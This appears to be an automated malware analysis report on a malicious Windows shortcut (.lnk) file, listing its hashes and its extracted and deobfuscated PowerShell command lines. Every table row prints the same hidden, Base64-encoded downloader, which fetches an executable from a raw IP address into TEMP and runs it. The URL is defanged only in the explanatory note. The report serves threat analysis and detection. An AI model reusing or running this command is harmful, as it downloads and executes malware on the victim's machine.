| Hash | Hash Value |
|---|---|
| MD5 | dc733f068184e3adba0100f33a8ee55a |
| Sha1 | eb11ef784534e1b729f551e475904ef29080325f |
| Sha256 | 292ef9c837eb247376d40aec091bac4b2ca4195d15614895cc4629d4b62d4604 |
| Sha384 | 9a5e5eebeebe1b879f480cff035eb37c3825144908588a2232366a6534e1d1de07044a9795b70c96569ceaac3ef92161 |
| Sha512 | 142ad755e169c2452b802ac706d0be37e4f66290ffd66c32bbb3bb3ab0f5e6fec0b03218b7b13ddd20d3e71de6fb66e52e07fb335c1cbc7960e66247b4b5c2ff |
| SSDeep | 48:8WfJhs/qCD4npTX46to/A3gm0lO9pIiLxKpKTai6:8y83EeA3ylO9pjng |
| TLSH | 7851102516F20218E2B2AB3568F97615CDB3BD26ED35AE4E014C07851B23A00DE24F3F |

| Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=='))); |
| Deobfuscated PowerShell | -noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) |
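| Deobfuscated PowerShell | -noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) |

Note: the rows labelled "Deobfuscated PowerShell" still carry the Base64 argument in encoded form. Decoded as UTF-8, that argument sets a path of `$env:TEMP\Any Name.exe`, downloads `hxxp://192.210.236[.]175/preaccepts.exe` (defanged here) to that path with `System.Net.WebClient.DownloadFile`, and launches the file with `start`.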

| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=='))); Malicious | oustanding!$&()blance500%&00$&09finalrevised.lnk |
| Deobfuscated PowerShell | -noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) Malicious | oustanding!$&()blance500%&00$&09finalrevised.lnk > LNK CommandLine |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) Malicious | oustanding!$&()blance500%&00$&09finalrevised.lnk > LNK CommandLine > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) Malicious | oustanding!$&()blance500%&00$&09finalrevised.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | -noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw=="))) Malicious | oustanding!$&()blance500%&00$&09finalrevised.lnk > LNK CommandLine > [Deobfuscated PS] |